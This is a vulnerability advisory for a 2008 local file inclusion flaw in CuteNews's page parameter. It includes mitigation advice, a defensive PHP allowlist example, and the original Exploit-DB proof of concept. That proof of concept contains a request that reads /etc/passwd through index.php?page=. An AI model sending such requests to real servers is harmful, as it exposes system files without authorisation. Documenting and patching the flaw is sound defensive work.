Vendor: CuteNews
By: eidelweiss
CVSS: 7.5 (HIGH)
Vulnerability Type: Local File Inclusion
CWE: 98
Product Name: CuteNews
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

CuteNews (page) Local File Inclusion Vulnerability

CuteNews is vulnerable to local file inclusion through the page parameter. An attacker can exploit this by sending a crafted HTTP request with a malicious page parameter, which the application then uses to include a local file from the web server. For example, a request with the page parameter set to /etc/passwd includes the contents of the /etc/passwd file in the response.

Mitigation:

The best way to mitigate this vulnerability is to restrict access to the vulnerable page parameter. The application should also validate the page parameter to ensure that it does not contain any malicious content.
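
One way to implement the validation described above, as an added example that is not CuteNews code and not part of the original advisory: the page value is used only as a key into a fixed allowlist, and the resolved path is checked to stay inside the pages directory. The directory layout, the page names and the resolve_page helper are assumptions, and the code requires PHP 8.

```php
<?php
declare(strict_types=1);

// Hypothetical page loader (not CuteNews source). The directory and the
// page names are assumptions for illustration.
const PAGES_DIR = __DIR__ . '/pages';

// Allowlist: the request value is only a lookup key, never part of a path.
const PAGES = [
    'home'    => 'home.php',
    'archive' => 'archive.php',
    'search'  => 'search.php',
];

/**
 * Map the untrusted ?page= value to a file inside PAGES_DIR, or return null.
 */
function resolve_page(mixed $requested): ?string
{
    // ?page[]=x arrives as an array; anything that is not a string is rejected.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }

    // Defence in depth: resolve symlinks and confirm the target is still
    // inside PAGES_DIR before it is handed to include.
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . PAGES[$requested]);
    if ($base === false || $path === false
        || !str_starts_with($path, $base . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return $path;
}

// Weak pattern this replaces (assumed, shown for contrast only):
//     include $_GET['page'];
$target = resolve_page($_GET['page'] ?? 'home');
if ($target === null) {
    http_response_code(404);
    exit('Page not found');
}
include $target;
```

A value such as /etc/passwd is not a key in the allowlist, so it is rejected before any filesystem call is made.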
Source

Exploit-DB raw data:

==========================================================
	CuteNews (page) local File Inclusion Vulnerability
==========================================================
vendor: http://cutephp.com/
Author: eidelweiss
Contact: eidelweiss [at] windowslive [dot] com

==========================================================

vuln: index.php?page=

lfi: /etc/passwd

exploit : index.php?page= [lfi]

	-=[p0c]=-
	
	http://127.0.0.1/index.php?page= [lfi]
			or
	http://127.0.0.1/path/index.php?page=/etc/passwdt

=========================| -=[ E0F ]=- |============================